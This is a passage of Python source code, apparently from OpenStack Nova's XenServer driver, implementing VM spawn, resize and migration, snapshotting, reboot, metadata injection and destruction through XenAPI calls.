if instance['kernel_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['kernel_id'],
vm_utils.ImageType.KERNEL)
kernel_file = vdis['kernel'].get('file')
if instance['ramdisk_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['ramdisk_id'],
vm_utils.ImageType.RAMDISK)
ramdisk_file = vdis['ramdisk'].get('file')
disk_image_type = vm_utils.determine_disk_image_type(image_meta)
vm_ref = self._create_vm(context, instance, instance['name'],
{'root': root_vdi},
disk_image_type, network_info, kernel_file,
ramdisk_file)
self._attach_mapped_block_devices(instance, block_device_info)
# 5. Start VM
self._start(instance, vm_ref=vm_ref)
self._update_instance_progress(context, instance,
step=5,
total_steps=RESIZE_TOTAL_STEPS)
def _start(self, instance, vm_ref=None, bad_volumes_callback=None):
"""Power on a VM instance."""
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
LOG.debug(_("Starting instance"), instance=instance)
# Attached volumes that have become non-responsive will prevent a VM
# from starting, so scan for these before attempting to start
#
# In order to make sure this detach is consistent (virt, BDM, cinder),
# we only detach in the virt-layer if a callback is provided.
if bad_volumes_callback:
bad_devices = self._volumeops.find_bad_volumes(vm_ref)
for device_name in bad_devices:
self._volumeops.detach_volume(
None, instance['name'], device_name)
self._session.call_xenapi('VM.start_on', vm_ref,
self._session.get_xenapi_host(),
False, False)
# Allow higher-layers a chance to detach bad-volumes as well (in order
# to cleanup BDM entries and detach in Cinder)
if bad_volumes_callback and bad_devices:
bad_volumes_callback(bad_devices)
def _create_disks(self, context, instance, name_label, disk_image_type,
image_meta, block_device_info=None):
vdis = vm_utils.get_vdis_for_instance(context, self._session,
instance, name_label,
image_meta.get('id'),
disk_image_type,
block_device_info=block_device_info)
# Just get the VDI ref once
for vdi in vdis.itervalues():
vdi['ref'] = self._session.call_xenapi('VDI.get_by_uuid',
vdi['uuid'])
root_vdi = vdis.get('root')
if root_vdi:
self._resize_instance(instance, root_vdi)
return vdis
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None,
name_label=None, rescue=False):
if name_label is None:
name_label = instance['name']
step = make_step_decorator(context, instance,
self._virtapi.instance_update)
@step
def determine_disk_image_type_step(undo_mgr):
return vm_utils.determine_disk_image_type(image_meta)
@step
def create_disks_step(undo_mgr, disk_image_type, image_meta):
vdis = self._create_disks(context, instance, name_label,
disk_image_type, image_meta,
block_device_info=block_device_info)
def undo_create_disks():
vdi_refs = [vdi['ref'] for vdi in vdis.values()
if not vdi.get('osvol')]
vm_utils.safe_destroy_vdis(self._session, vdi_refs)
undo_mgr.undo_with(undo_create_disks)
return vdis
@step
def create_kernel_ramdisk_step(undo_mgr):
kernel_file = None
ramdisk_file = None
if instance['kernel_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['kernel_id'],
vm_utils.ImageType.KERNEL)
kernel_file = vdis['kernel'].get('file')
if instance['ramdisk_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['ramdisk_id'],
vm_utils.ImageType.RAMDISK)
ramdisk_file = vdis['ramdisk'].get('file')
def undo_create_kernel_ramdisk():
if kernel_file or ramdisk_file:
LOG.debug(_("Removing kernel/ramdisk files from dom0"),
instance=instance)
vm_utils.destroy_kernel_ramdisk(
self._session, kernel_file, ramdisk_file)
undo_mgr.undo_with(undo_create_kernel_ramdisk)
return kernel_file, ramdisk_file
@step
def create_vm_record_step(undo_mgr, vdis, disk_image_type,
kernel_file, ramdisk_file):
vm_ref = self._create_vm_record(context, instance, name_label,
vdis, disk_image_type, kernel_file, ramdisk_file)
def undo_create_vm():
self._destroy(instance, vm_ref, network_info=network_info)
undo_mgr.undo_with(undo_create_vm)
return vm_ref
@step
def attach_disks_step(undo_mgr, vm_ref, vdis, disk_image_type):
self._attach_disks(instance, vm_ref, name_label, vdis,
disk_image_type, admin_password,
injected_files)
if rescue:
# NOTE(johannes): Attach root disk to rescue VM now, before
# booting the VM, since we can't hotplug block devices
# on non-PV guests
@step
def attach_root_disk_step(undo_mgr, vm_ref):
orig_vm_ref = vm_utils.lookup(self._session, instance['name'])
vdi_ref = self._find_root_vdi_ref(orig_vm_ref)
vm_utils.create_vbd(self._session, vm_ref, vdi_ref,
DEVICE_RESCUE, bootable=False)
@step
def setup_network_step(undo_mgr, vm_ref, vdis):
self._setup_vm_networking(instance, vm_ref, vdis, network_info,
rescue)
@step
def inject_metadata_step(undo_mgr, vm_ref):
self.inject_instance_metadata(instance, vm_ref)
@step
def inject_provider_data_step(undo_mgr, vm_ref):
self.inject_provider_data(instance, vm_ref, context)
@step
def prepare_security_group_filters_step(undo_mgr):
try:
self.firewall_driver.setup_basic_filtering(
instance, network_info)
except NotImplementedError:
# NOTE(salvatore-orlando): setup_basic_filtering might be
# empty or not implemented at all, as basic filter could
# be implemented with VIF rules created by xapi plugin
pass
self.firewall_driver.prepare_instance_filter(instance,
network_info)
@step
def boot_instance_step(undo_mgr, vm_ref):
self._boot_new_instance(instance, vm_ref, injected_files,
admin_password, image_meta)
@step
def apply_security_group_filters_step(undo_mgr):
self.firewall_driver.apply_instance_filter(instance, network_info)
@step
def bdev_set_default_root(undo_mgr):
if block_device_info:
LOG.debug(_("Block device information present: %s")
% block_device_info, instance=instance)
if block_device_info and not block_device_info['root_device_name']:
block_device_info['root_device_name'] = self.default_root_dev
undo_mgr = utils.UndoManager()
try:
# NOTE(sirp): The create_disks() step will potentially take a
# *very* long time to complete since it has to fetch the image
# over the network and images can be several gigs in size. To
# avoid progress remaining at 0% for too long, make sure the
# first step is something that completes rather quickly.
bdev_set_default_root(undo_mgr)
disk_image_type = determine_disk_image_type_step(undo_mgr)
vdis = create_disks_step(undo_mgr, disk_image_type, image_meta)
kernel_file, ramdisk_file = create_kernel_ramdisk_step(undo_mgr)
vm_ref = create_vm_record_step(undo_mgr, vdis, disk_image_type,
kernel_file, ramdisk_file)
attach_disks_step(undo_mgr, vm_ref, vdis, disk_image_type)
setup_network_step(undo_mgr, vm_ref, vdis)
inject_metadata_step(undo_mgr, vm_ref)
inject_provider_data_step(undo_mgr, vm_ref)
prepare_security_group_filters_step(undo_mgr)
if rescue:
attach_root_disk_step(undo_mgr, vm_ref)
boot_instance_step(undo_mgr, vm_ref)
apply_security_group_filters_step(undo_mgr)
except Exception:
msg = _("Failed to spawn, rolling back")
undo_mgr.rollback_and_reraise(msg=msg, instance=instance)
def _create_vm(self, context, instance, name_label, vdis,
disk_image_type, network_info, kernel_file=None,
ramdisk_file=None, rescue=False):
"""Create VM instance."""
vm_ref = self._create_vm_record(context, instance, name_label,
vdis, disk_image_type, kernel_file, ramdisk_file)
self._attach_disks(instance, vm_ref, name_label, vdis,
disk_image_type)
self._setup_vm_networking(instance, vm_ref, vdis, network_info,
rescue)
# NOTE(mikal): file injection only happens if we are _not_ using a
# configdrive.
if not configdrive.required_by(instance):
self.inject_instance_metadata(instance, vm_ref)
self.inject_provider_data(instance, vm_ref, context)
return vm_ref
def _setup_vm_networking(self, instance, vm_ref, vdis, network_info,
rescue):
# Alter the image before VM start for network injection.
if CONF.flat_injected:
vm_utils.preconfigure_instance(self._session, instance,
vdis['root']['ref'], network_info)
self._create_vifs(vm_ref, instance, network_info)
self.inject_network_info(instance, network_info, vm_ref)
hostname = instance['hostname']
if rescue:
hostname = 'RESCUE-%s' % hostname
self.inject_hostname(instance, vm_ref, hostname)
def _create_vm_record(self, context, instance, name_label, vdis,
disk_image_type, kernel_file, ramdisk_file):
"""Create the VM record in Xen, making sure that we do not create
a duplicate name-label. Also do a rough sanity check on memory
to try to short-circuit a potential failure later. (The memory
check only accounts for running VMs, so it can miss other builds
that are in progress.)
"""
vm_ref = vm_utils.lookup(self._session, name_label)
if vm_ref is not None:
raise exception.InstanceExists(name=name_label)
# Ensure enough free memory is available
if not vm_utils.ensure_free_mem(self._session, instance):
raise exception.InsufficientFreeMemory(uuid=instance['uuid'])
mode = self._determine_vm_mode(instance, vdis, disk_image_type)
if instance['vm_mode'] != mode:
# Update database with normalized (or determined) value
self._virtapi.instance_update(context,
instance['uuid'], {'vm_mode': mode})
use_pv_kernel = (mode == vm_mode.XEN)
vm_ref = vm_utils.create_vm(self._session, instance, name_label,
kernel_file, ramdisk_file, use_pv_kernel)
return vm_ref
def _determine_vm_mode(self, instance, vdis, disk_image_type):
current_mode = vm_mode.get_from_instance(instance)
if current_mode == vm_mode.XEN or current_mode == vm_mode.HVM:
return current_mode
is_pv = False
if 'root' in vdis:
os_type = instance['os_type']
vdi_ref = vdis['root']['ref']
is_pv = vm_utils.determine_is_pv(self._session, vdi_ref,
disk_image_type, os_type)
if is_pv:
return vm_mode.XEN
else:
return vm_mode.HVM
def _attach_disks(self, instance, vm_ref, name_label, vdis,
disk_image_type, admin_password=None, files=None):
ctx = nova_context.get_admin_context()
instance_type = flavors.extract_instance_type(instance)
# Attach (required) root disk
if disk_image_type == vm_utils.ImageType.DISK_ISO:
# DISK_ISO needs two VBDs: the ISO disk and a blank RW disk
root_disk_size = instance_type['root_gb']
if root_disk_size > 0:
vm_utils.generate_iso_blank_root_disk(self._session, instance,
vm_ref, DEVICE_ROOT, name_label, root_disk_size)
cd_vdi = vdis.pop('iso')
vm_utils.attach_cd(self._session, vm_ref, cd_vdi['ref'],
DEVICE_CD)
else:
root_vdi = vdis['root']
if instance['auto_disk_config']:
LOG.debug(_("Auto configuring disk, attempting to "
"resize partition..."), instance=instance)
vm_utils.auto_configure_disk(self._session,
root_vdi['ref'],
instance_type['root_gb'])
vm_utils.create_vbd(self._session, vm_ref, root_vdi['ref'],
DEVICE_ROOT, bootable=True,
osvol=root_vdi.get('osvol'))
# Attach (optional) additional block-devices
for type_, vdi_info in vdis.items():
# Additional block-devices for boot use their device-name as the
# type.
if not type_.startswith('/dev'):
continue
# Convert device name to userdevice number, e.g. /dev/xvdb -> 1
userdevice = ord(block_device.strip_prefix(type_)) - ord('a')
vm_utils.create_vbd(self._session, vm_ref, vdi_info['ref'],
userdevice, bootable=False,
osvol=vdi_info.get('osvol'))
# Attach (optional) swap disk
swap_mb = instance_type['swap']
if swap_mb:
vm_utils.generate_swap(self._session, instance, vm_ref,
DEVICE_SWAP, name_label, swap_mb)
# Attach (optional) ephemeral disk
ephemeral_gb = instance_type['ephemeral_gb']
if ephemeral_gb:
vm_utils.generate_ephemeral(self._session, instance, vm_ref,
DEVICE_EPHEMERAL, name_label,
ephemeral_gb)
# Attach (optional) configdrive v2 disk
if configdrive.required_by(instance):
vm_utils.generate_configdrive(self._session, instance, vm_ref,
DEVICE_CONFIGDRIVE,
admin_password=admin_password,
files=files)
def _boot_new_instance(self, instance, vm_ref, injected_files,
admin_password, image_meta):
"""Boot a new instance and configure it."""
LOG.debug(_('Starting VM'), instance=instance)
self._start(instance, vm_ref)
ctx = nova_context.get_admin_context()
# Wait for boot to finish
LOG.debug(_('Waiting for instance state to become running'),
instance=instance)
expiration = time.time() + CONF.xenapi_running_timeout
while time.time() < expiration:
state = self.get_info(instance, vm_ref)['state']
if state == power_state.RUNNING:
break
greenthread.sleep(0.5)
if self.agent_enabled:
agent_build = self._virtapi.agent_build_get_by_triple(
ctx, 'xen', instance['os_type'], instance['architecture'])
if agent_build:
LOG.info(_('Latest agent build for %(hypervisor)s/%(os)s'
'/%(architecture)s is %(version)s') % agent_build)
else:
LOG.info(_('No agent build found for %(hypervisor)s/%(os)s'
'/%(architecture)s') % {
'hypervisor': 'xen',
'os': instance['os_type'],
'architecture': instance['architecture']})
# Update agent, if necessary
# This also waits until the agent starts
agent = self._get_agent(instance, vm_ref)
version = agent.get_agent_version()
if version:
LOG.info(_('Instance agent version: %s'), version,
instance=instance)
if (version and agent_build and
cmp_version(version, agent_build['version']) < 0):
agent.agent_update(agent_build)
# if the guest agent is not available, configure the
# instance, but skip the admin password configuration
no_agent = version is None
# Inject ssh key.
agent.inject_ssh_key()
# Inject files, if necessary
if injected_files:
# Inject any files, if specified
for path, contents in injected_files:
agent.inject_file(path, contents)
# Set admin password, if necessary
if admin_password and not no_agent:
agent.set_admin_password(admin_password)
# Reset network config
agent.resetnetwork()
# Set VCPU weight
instance_type = flavors.extract_instance_type(instance)
vcpu_weight = instance_type['vcpu_weight']
if vcpu_weight is not None:
LOG.debug(_("Setting VCPU weight"), instance=instance)
self._session.call_xenapi('VM.add_to_VCPUs_params', vm_ref,
'weight', str(vcpu_weight))
# Activate OS (if necessary)
profile = image_meta.get('properties', {}).\
get('rax_activation_profile')
if profile:
LOG.debug(_("RAX Activation Profile: %r"), profile,
instance=instance)
# get matching activation config for this profile:
config = self._rax_image_activation_config.get(profile)
if config:
agent.activate_instance(self._session, instance, vm_ref,
config)
def _get_vm_opaque_ref(self, instance, check_rescue=False):
"""Get xapi OpaqueRef from a db record.
:param check_rescue: if True will return the 'name'-rescue vm if it
exists, instead of just 'name'
"""
vm_ref = vm_utils.lookup(self._session, instance['name'], check_rescue)
if vm_ref is None:
raise exception.NotFound(_('Could not find VM with name %s') %
instance['name'])
return vm_ref
def _acquire_bootlock(self, vm):
"""Prevent an instance from booting."""
self._session.call_xenapi(
"VM.set_blocked_operations",
vm,
{"start": ""})
def _release_bootlock(self, vm):
"""Allow an instance to boot."""
self._session.call_xenapi(
"VM.remove_from_blocked_operations",
vm,
"start")
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance.
:param context: request context
:param instance: instance to be snapshotted
:param image_id: id of image to upload to
Steps involved in a XenServer snapshot:
1. XAPI-Snapshot: Snapshotting the instance using XenAPI. This
creates: Snapshot (Template) VM, Snapshot VBD, Snapshot VDI,
Snapshot VHD
2. Wait-for-coalesce: The Snapshot VDI and Instance VDI both point to
a 'base-copy' VDI. The base_copy is immutable and may be chained
with other base_copies. If chained, the base_copies
coalesce together, so, we must wait for this coalescing to occur to
get a stable representation of the data on disk.
3. Push-to-data-store: Once coalesced, we call a plugin on the
XenServer that will bundle the VHDs together and then push the
bundle. Depending on the configured value of
'xenapi_image_upload_handler', image data may be pushed to
Glance or the specified data store.
"""
vm_ref = self._get_vm_opaque_ref(instance)
label = "%s-snapshot" % instance['name']
max_size = CONF.max_snapshot_size
with vm_utils.snapshot_attached_here(
self._session, instance, vm_ref, label,
update_task_state) as vdi_uuids:
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
try:
self.image_upload_handler.upload_image(context,
self._session,
instance,
vdi_uuids,
image_id,
max_size)
except self._session.XenAPI.Failure as exc:
_type, _method, error = exc.details[:3]
if error == 'VHDsTooLargeError':
LOG.warn(_("Refusing to create snapshot. Instance size is"
" greater than maximum allowed snapshot size"),
instance=instance)
image_service = glance.get_default_image_service()
image_service.update(context, image_id,
{'status': 'error'})
update_task_state(task_state=None,
expected_state=task_states.IMAGE_UPLOADING)
return
else:
raise
LOG.debug(_("Finished snapshot and upload for VM"),
instance=instance)
def _migrate_vhd(self, instance, vdi_uuid, dest, sr_path, seq_num):
LOG.debug(_("Migrating VHD '%(vdi_uuid)s' with seq_num %(seq_num)d"),
locals(), instance=instance)
instance_uuid = instance['uuid']
try:
self._session.call_plugin_serialized('migration', 'transfer_vhd',
instance_uuid=instance_uuid, host=dest, vdi_uuid=vdi_uuid,
sr_path=sr_path, seq_num=seq_num)
except self._session.XenAPI.Failure:
msg = _("Failed to transfer vhd to new host")
raise exception.MigrationError(reason=msg)
def _get_orig_vm_name_label(self, instance):
return instance['name'] + '-orig'
def _update_instance_progress(self, context, instance, step, total_steps):
"""Update instance progress percent to reflect current step number
"""
# FIXME(sirp): for now we're taking a KISS approach to instance
# progress:
# Divide the action's workflow into discrete steps and "bump" the
# instance's progress field as each step is completed.
#
# For a first cut this should be fine, however, for large VM images,
# the _create_disks step begins to dominate the equation. A
# better approximation would use the percentage of the VM image that
# has been streamed to the destination host.
progress = round(float(step) / total_steps * 100)
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
self._virtapi.instance_update(context, instance['uuid'],
{'progress': progress})
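        # Illustrative: with RESIZE_TOTAL_STEPS = 5, completing step 3 reports
        # round(3.0 / 5 * 100) = 60 percent.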
def _resize_ensure_vm_is_shutdown(self, instance, vm_ref):
if vm_utils.is_vm_shutdown(self._session, vm_ref):
LOG.debug(_("VM was already shutdown."), instance=instance)
return
if not vm_utils.clean_shutdown_vm(self._session, instance, vm_ref):
LOG.debug(_("Clean shutdown did not complete successfully, "
"trying hard shutdown."), instance=instance)
if not vm_utils.hard_shutdown_vm(self._session, instance, vm_ref):
raise exception.ResizeError(
reason=_("Unable to terminate instance."))
def _migrate_disk_resizing_down(self, context, instance, dest,
instance_type, vm_ref, sr_path):
if not instance['auto_disk_config']:
reason = _('Resize down not allowed without auto_disk_config')
raise exception.ResizeError(reason=reason)
step = make_step_decorator(context, instance,
self._virtapi.instance_update)
@step
def fake_step_to_match_resizing_up():
pass
@step
def rename_and_power_off_vm(undo_mgr):
self._resize_ensure_vm_is_shutdown(instance, vm_ref)
self._apply_orig_vm_name_label(instance, vm_ref)
def restore_orig_vm():
# Do not need to restore block devices, not yet been removed
self._restore_orig_vm_and_cleanup_orphan(instance, None)
undo_mgr.undo_with(restore_orig_vm)
@step
def create_copy_vdi_and_resize(undo_mgr, old_vdi_ref):
new_vdi_ref, new_vdi_uuid = vm_utils.resize_disk(self._session,
instance, old_vdi_ref, instance_type)
def cleanup_vdi_copy():
vm_utils.destroy_vdi(self._session, new_vdi_ref)
undo_mgr.undo_with(cleanup_vdi_copy)
return new_vdi_ref, new_vdi_uuid
@step
def transfer_vhd_to_dest(new_vdi_ref, new_vdi_uuid):
self._migrate_vhd(instance, new_vdi_uuid, dest, sr_path, 0)
# Clean up VDI now that it's been copied
vm_utils.destroy_vdi(self._session, new_vdi_ref)
@step
def fake_step_to_be_executed_by_finish_migration():
pass
undo_mgr = utils.UndoManager()
try:
fake_step_to_match_resizing_up()
rename_and_power_off_vm(undo_mgr)
old_vdi_ref, _ignore = vm_utils.get_vdi_for_vm_safely(
self._session, vm_ref)
new_vdi_ref, new_vdi_uuid = create_copy_vdi_and_resize(
undo_mgr, old_vdi_ref)
transfer_vhd_to_dest(new_vdi_ref, new_vdi_uuid)
except Exception, error:
msg = _("_migrate_disk_resizing_down failed. "
"Restoring orig vm due_to: %{exception}.")
LOG.exception(msg, instance=instance)
undo_mgr._rollback()
raise exception.InstanceFaultRollback(error)
def _migrate_disk_resizing_up(self, context, instance, dest, vm_ref,
sr_path):
self._apply_orig_vm_name_label(instance, vm_ref)
# 1. Create Snapshot
label = "%s-snapshot" % instance['name']
with vm_utils.snapshot_attached_here(
self._session, instance, vm_ref, label) as vdi_uuids:
self._update_instance_progress(context, instance,
step=1,
total_steps=RESIZE_TOTAL_STEPS)
# 2. Transfer the immutable VHDs (base-copies)
#
# The first VHD will be the leaf (aka COW) that is being used by
# the VM. For this step, we're only interested in the immutable
# VHDs which are all of the parents of the leaf VHD.
for seq_num, vdi_uuid in itertools.islice(
enumerate(vdi_uuids), 1, None):
self._migrate_vhd(instance, vdi_uuid, dest, sr_path, seq_num)
self._update_instance_progress(context, instance,
step=2,
total_steps=RESIZE_TOTAL_STEPS)
# 3. Now power down the instance
self._resize_ensure_vm_is_shutdown(instance, vm_ref)
self._update_instance_progress(context, instance,
step=3,
total_steps=RESIZE_TOTAL_STEPS)
# 4. Transfer the COW VHD
vdi_ref, vm_vdi_rec = vm_utils.get_vdi_for_vm_safely(
self._session, vm_ref)
cow_uuid = vm_vdi_rec['uuid']
self._migrate_vhd(instance, cow_uuid, dest, sr_path, 0)
self._update_instance_progress(context, instance,
step=4,
total_steps=RESIZE_TOTAL_STEPS)
def _apply_orig_vm_name_label(self, instance, vm_ref):
# NOTE(sirp): in case we're resizing to the same host (for dev
# purposes), apply a suffix to name-label so the two VM records
# extant until a confirm_resize don't collide.
name_label = self._get_orig_vm_name_label(instance)
vm_utils.set_vm_name_label(self._session, vm_ref, name_label)
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, block_device_info):
"""Copies a VHD from one host machine to another, possibly
        resizing filesystem beforehand.
:param instance: the instance that owns the VHD in question.
:param dest: the destination host machine.
:param instance_type: instance_type to resize to
"""
# 0. Zero out the progress to begin
self._update_instance_progress(context, instance,
step=0,
total_steps=RESIZE_TOTAL_STEPS)
vm_ref = self._get_vm_opaque_ref(instance)
sr_path = vm_utils.get_sr_path(self._session)
old_gb = instance['root_gb']
new_gb = instance_type['root_gb']
resize_down = old_gb > new_gb
if resize_down:
self._migrate_disk_resizing_down(
context, instance, dest, instance_type, vm_ref, sr_path)
else:
self._migrate_disk_resizing_up(
context, instance, dest, vm_ref, sr_path)
self._detach_block_devices_from_orig_vm(instance, block_device_info)
# NOTE(sirp): disk_info isn't used by the xenapi driver, instead it
# uses a staging-area (/images/instance<uuid>) and sequence-numbered
# VHDs to figure out how to reconstruct the VDI chain after syncing
disk_info = {}
return disk_info
def _detach_block_devices_from_orig_vm(self, instance, block_device_info):
block_device_mapping = virt_driver.block_device_info_get_mapping(
block_device_info)
name_label = self._get_orig_vm_name_label(instance)
for vol in block_device_mapping:
connection_info = vol['connection_info']
mount_device = vol['mount_device'].rpartition("/")[2]
self._volumeops.detach_volume(connection_info, name_label,
mount_device)
def _resize_instance(self, instance, root_vdi):
"""Resize an instances root disk."""
new_disk_size = instance['root_gb'] * 1024 * 1024 * 1024
if not new_disk_size:
return
# Get current size of VDI
virtual_size = self._session.call_xenapi('VDI.get_virtual_size',
root_vdi['ref'])
virtual_size = int(virtual_size)
old_gb = virtual_size / (1024 * 1024 * 1024)
new_gb = instance['root_gb']
if virtual_size < new_disk_size:
# Resize up. Simple VDI resize will do the trick
vdi_uuid = root_vdi['uuid']
LOG.debug(_("Resizing up VDI %(vdi_uuid)s from %(old_gb)dGB to "
"%(new_gb)dGB"), locals(), instance=instance)
resize_func_name = self.check_resize_func_name()
self._session.call_xenapi(resize_func_name, root_vdi['ref'],
str(new_disk_size))
LOG.debug(_("Resize complete"), instance=instance)
def check_resize_func_name(self):
"""Check the function name used to resize an instance based
on product_brand and product_version."""
brand = self._session.product_brand
version = self._session.product_version
# To maintain backwards compatibility. All recent versions
# should use VDI.resize
if bool(version) and bool(brand):
xcp = brand == 'XCP'
r1_2_or_above = (
(
version[0] == 1
and version[1] > 1
)
or version[0] > 1)
xenserver = brand == 'XenServer'
r6_or_above = version[0] > 5
if (xcp and not r1_2_or_above) or (xenserver and not r6_or_above):
return 'VDI.resize_online'
return 'VDI.resize'
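    # Illustrative application of the rule above: XenServer 5.6 and XCP 1.1
    # yield 'VDI.resize_online', while XenServer 6.0+ and XCP 1.2+ yield
    # 'VDI.resize'.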
def reboot(self, instance, reboot_type, bad_volumes_callback=None):
"""Reboot VM instance."""
# Note (salvatore-orlando): security group rules are not re-enforced
# upon reboot, since this action on the XenAPI drivers does not
# remove existing filters
vm_ref = self._get_vm_opaque_ref(instance, check_rescue=True)
try:
if reboot_type == "HARD":
self._session.call_xenapi('VM.hard_reboot', vm_ref)
else:
self._session.call_xenapi('VM.clean_reboot', vm_ref)
except self._session.XenAPI.Failure as exc:
details = exc.details
if (details[0] == 'VM_BAD_POWER_STATE' and
details[-1] == 'halted'):
LOG.info(_("Starting halted instance found during reboot"),
instance=instance)
self._start(instance, vm_ref=vm_ref,
bad_volumes_callback=bad_volumes_callback)
return
elif details[0] == 'SR_BACKEND_FAILURE_46':
LOG.warn(_("Reboot failed due to bad volumes, detaching bad"
" volumes and starting halted instance"),
instance=instance)
self._start(instance, vm_ref=vm_ref,
bad_volumes_callback=bad_volumes_callback)
return
else:
raise
def set_admin_password(self, instance, new_pass):
"""Set the root/admin password on the VM instance."""
if self.agent_enabled:
vm_ref = self._get_vm_opaque_ref(instance)
agent = self._get_agent(instance, vm_ref)
agent.set_admin_password(new_pass)
else:
raise NotImplementedError()
def inject_file(self, instance, path, contents):
"""Write a file to the VM instance."""
if self.agent_enabled:
vm_ref = self._get_vm_opaque_ref(instance)
agent = self._get_agent(instance, vm_ref)
agent.inject_file(path, contents)
else:
raise NotImplementedError()
@staticmethod
def _sanitize_xenstore_key(key):
"""
Xenstore only allows the following characters as keys:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
0123456789-/_@
So convert the others to _
Also convert / to _, because that is somewhat like a path
separator.
"""
allowed_chars = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789-_@")
return ''.join([x in allowed_chars and x or '_' for x in key])
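    # For example (illustrative): a key such as 'image/os distro' is stored in
    # xenstore as 'image_os_distro', since '/' and ' ' are both outside the
    # allowed character set.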
def inject_instance_metadata(self, instance, vm_ref):
"""Inject instance metadata into xenstore."""
def store_meta(topdir, data_list):
for item in data_list:
key = self._sanitize_xenstore_key(item['key'])
value = item['value'] or ''
self._add_to_param_xenstore(vm_ref, '%s/%s' % (topdir, key),
jsonutils.dumps(value))
# Store user metadata
store_meta('vm-data/user-metadata', instance['metadata'])
def change_instance_metadata(self, instance, diff):
"""Apply changes to instance metadata to xenstore."""
vm_ref = self._get_vm_opaque_ref(instance)
for key, change in diff.items():
key = self._sanitize_xenstore_key(key)
location = 'vm-data/user-metadata/%s' % key
if change[0] == '-':
self._remove_from_param_xenstore(vm_ref, location)
try:
self._delete_from_xenstore(instance, location,
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
elif change[0] == '+':
self._add_to_param_xenstore(vm_ref, location,
jsonutils.dumps(change[1]))
try:
self._write_to_xenstore(instance, location, change[1],
vm_ref=vm_ref)
except KeyError:
# catch KeyError for domid if instance isn't running
pass
def _find_root_vdi_ref(self, vm_ref):
"""Find and return the root vdi ref for a VM."""
if not vm_ref:
return None
vbd_refs = self._session.call_xenapi("VM.get_VBDs", vm_ref)
for vbd_uuid in vbd_refs:
vbd = self._session.call_xenapi("VBD.get_record", vbd_uuid)
if vbd["userdevice"] == DEVICE_ROOT:
return vbd["VDI"]
raise exception.NotFound(_("Unable to find root VBD/VDI for VM"))
def _destroy_vdis(self, instance, vm_ref):
"""Destroys all VDIs associated with a VM."""
LOG.debug(_("Destroying VDIs"), instance=instance)
vdi_refs = vm_utils.lookup_vm_vdis(self._session, vm_ref)
if not vdi_refs:
return
for vdi_ref in vdi_refs:
try:
vm_utils.destroy_vdi(self._session, vdi_ref)
except volume_utils.StorageError as exc:
LOG.error(exc)
def _destroy_kernel_ramdisk(self, instance, vm_ref):
"""Three situations can occur:
1. We have neither a ramdisk nor a kernel, in which case we are a
RAW image and can omit this step
2. We have one or the other, in which case, we should flag as an
error
3. We have both, in which case we safely remove both the kernel
and the ramdisk.
"""
instance_uuid = instance['uuid']
if not instance['kernel_id'] and not instance['ramdisk_id']:
# 1. No kernel or ramdisk
LOG.debug(_("Using RAW or VHD, skipping kernel and ramdisk "
"deletion"), instance=instance)
return
if not (instance['kernel_id'] and instance['ramdisk_id']):
# 2. We only have kernel xor ramdisk
raise exception.InstanceUnacceptable(instance_id=instance_uuid,
reason=_("instance has a kernel or ramdisk but not both"))
# 3. We have both kernel and ramdisk
(kernel, ramdisk) = vm_utils.lookup_kernel_ramdisk(self._session,
vm_ref)
if kernel or ramdisk:
vm_utils.destroy_kernel_ramdisk(self._session, kernel, ramdisk)
LOG.debug(_("kernel/ramdisk files removed"), instance=instance)
def _destroy_rescue_instance(self, rescue_vm_ref, original_vm_ref):
"""Destroy a rescue instance."""
# Shutdown Rescue VM
vm_rec = self._session.call_xenapi("VM.get_record", rescue_vm_ref)
state = vm_utils.compile_info(vm_rec)['state']
if state != power_state.SHUTDOWN:
self._session.call_xenapi("VM.hard_shutdown", rescue_vm_ref)
# Destroy Rescue VDIs
vdi_refs = vm_utils.lookup_vm_vdis(self._session, rescue_vm_ref)
root_vdi_ref = self._find_root_vdi_ref(original_vm_ref)
vdi_refs = [vdi_ref for vdi_ref in vdi_refs if vdi_ref != root_vdi_ref]
vm_utils.safe_destroy_vdis(self._session, vdi_refs)
# Destroy Rescue VM
self._session.call_xenapi("VM.destroy", rescue_vm_ref)
def destroy(self, instance, network_info, block_device_info=None,
destroy_disks=True):
"""Destroy VM instance.
This is the method exposed by xenapi_conn.destroy(). The rest of the
destroy_* methods are internal.
"""
LOG.info(_("Destroying VM"), instance=instance)
# We don't use _get_vm_opaque_ref because the instance may
# truly not exist because of a failure during build. A valid
# vm_ref is checked correctly where necessary.
vm_ref = vm_utils.lookup(self._session, instance['name'])
rescue_vm_ref = vm_utils.lookup(self._session,
"%s-rescue" % instance['name'])
if rescue_vm_ref:
self._destroy_rescue_instance(rescue_vm_ref, vm_ref)
# NOTE(sirp): `block_device_info` is not used, information about which
# volumes should be detached is determined by the
# VBD.other_config['osvol'] attribute
return self._destroy(instance, vm_ref, network_info=network_info,
destroy_disks=destroy_disks)
def _destroy(self, instance, vm_ref, network_info=None,
destroy_disks=True):
"""Destroys VM instance by performing:
1. A shutdown
2. Destroying associated VDIs.
3. Destroying kernel and ramdisk files (if necessary).
4. Destroying that actual VM record.
"""
if vm_ref is None:
LOG.warning(_("VM is not present, skipping destroy..."),
instance=instance)
return
vm_utils.hard_shutdown_vm(self._session, instance, vm_ref)
if destroy_disks:
self._volumeops.detach_all(vm_ref)
self._destroy_vdis(instance, vm_ref)
self._destroy_kernel_ramdisk(instance, vm_ref)
vm_utils.destroy_vm(self._session, instance, vm_ref)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(
instance, network_info=network_info)
def pause(self, instance):
"""Pause VM instance."""
vm_ref = self._get_vm_opaque_ref(instance)
self._session.call_xenapi('VM.pause', vm_ref)
def unpause(self, instance):
"""Unpause VM instance."""
